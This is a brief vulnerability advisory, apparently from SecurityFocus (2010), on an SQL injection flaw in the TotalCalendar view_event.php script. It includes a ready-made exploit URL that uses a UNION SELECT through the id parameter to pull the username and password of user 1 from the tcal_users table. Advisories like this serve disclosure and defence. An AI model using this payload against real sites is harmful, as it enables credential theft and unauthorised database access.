TotalCalendar View_Event Script SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example was provided:

http://www.example.com/calender/path/view_event.php?id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,concat(username,0x3a,pw),5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/tcal_users/**/WHERE/**/uid=1/*


 

Privacy Statement
Copyright 2010, SecurityFocus